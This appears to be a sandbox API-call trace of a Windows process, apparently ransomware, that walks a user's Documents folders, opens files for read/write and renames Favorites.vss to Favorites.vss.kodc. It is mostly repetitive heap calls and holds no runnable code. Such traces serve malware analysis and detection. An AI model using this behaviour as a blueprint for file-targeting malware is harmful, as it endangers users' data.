[0100.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0100.990] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0100.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.990] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0100.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.990] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0100.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5d70 [0100.990] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0100.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0100.990] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0100.990] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0100.990] PathFindFileNameW (pszPath="") returned="" [0100.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.990] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117779f0, ftCreationTime.dwHighDateTime=0x1d5b5ad, ftLastAccessTime.dwLowDateTime=0x45bfd5f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ef, ftLastWriteTime.dwLowDateTime=0x45bfd5f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ef, nFileSizeHigh=0x0, nFileSizeLow=0x148b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rUjsNXVZqyJ.ots", cAlternateFileName="RUJSNX~1.OTS")) returned 0xffffffff [0100.990] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0100.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0100.991] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0100.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.991] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0100.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.991] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0100.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5d70 [0100.991] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0100.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0100.991] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0100.991] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0100.991] PathFindFileNameW (pszPath="") returned="" [0100.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.991] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0100.991] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.991] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0100.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0100.992] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned=".ini" [0100.992] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0100.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0100.992] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned=".vss" [0100.992] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.993] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=0) returned 1 [0100.993] CloseHandle (hObject=0x5cc) returned 1 [0100.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0100.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0100.993] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.kodc")) returned 1 [0100.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0100.994] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0100.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0100.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332de70 [0100.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dd80 [0100.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6931e0 [0100.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332db28 [0100.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0100.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0100.994] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0100.994] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0100.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0100.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dc90 | out: hHeap=0x630000) returned 1 [0100.995] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dc90 [0100.995] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0100.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.996] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0100.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.997] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.998] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0100.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0100.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0100.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0100.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0100.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0100.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0100.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0100.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0100.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0101.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0101.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0101.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0101.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0101.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0101.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.001] 